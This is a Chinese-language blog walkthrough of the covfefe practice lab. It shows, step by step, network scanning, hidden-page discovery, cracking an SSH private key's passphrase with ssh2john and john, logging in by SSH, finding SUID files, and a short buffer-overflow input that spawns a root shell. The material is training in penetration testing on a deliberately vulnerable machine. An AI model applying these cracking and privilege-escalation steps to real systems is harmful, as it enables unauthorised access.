covfefe靶场练习

本文介绍了在covfefe靶场中进行网络扫描和开放服务探测的过程。使用netdiscover和nmap扫描IP,通过dirb寻找隐藏页面,利用ssh2john转换密钥并用john解密,最终通过SSH登录并获取权限,揭示了渗透测试中的关键步骤和技术。
摘要由CSDN通过智能技术生成

 

对于covfefe靶场,在安装的时候一定要注意网络设置,不然netdiscover可能会扫描不到!!

  • 挖掘开放服务信息    对于只是给定一个对应ip地址的靶场机器,我们需要对其进行扫描,探测开放的服务,渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限
    • 探测靶场
      • sudo su -
      • netdiscover -r 192.168.1.1/24
    • nmap -sV 192.168.1.102

 

  • 探测大端口的信息,对于开放http服务的大端口,可采取http://ip:port/ 的形式访问
    查看源代码获取对应的信息,如果没有flag信息,使用工具探测隐藏页面
    • 对这个服务的隐藏文件进行探测 dirb http://ip:port/
    • 使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息
      • 找到ssh2john  locate ssh2john
      • ssh2john id_rsa > rsacrack
        • python /usr/share/john/ssh2john.py  id_rsa > rsacrack
      • 利用字典解密isacrack信息
        • zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules rsacrack
          • 找到密码 starwars
    • 分离用户名、利用ssh登录服务器
      • ssh -i id_rsa 用户名@ssh 靶场机器IP地址
        • ssh -i id_rsa simon@192.168.1.102
          • 密码 starwars
      • 查看路径 pwd
      • 查看文件 ls
      • cd /root
      • ls
      • cat flag.txt  被拒绝,需要提升权限
      • 查看具有root权限的文件  find / -perm -4000 2>/dev/null
      • 运行c文件 read_message
        • cat read_message.c
          • 看到里面有flag提示
        •  read_message
        • 通过溢出代码访问到加权文件超过20个字符,进入root权限
          • 输入  Simon123456789012345/bin/sh
          • 查看角色信息权限    whoami
        • cat flag.txt

 

 

 

-------------------------------------------------------------------------------------------

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值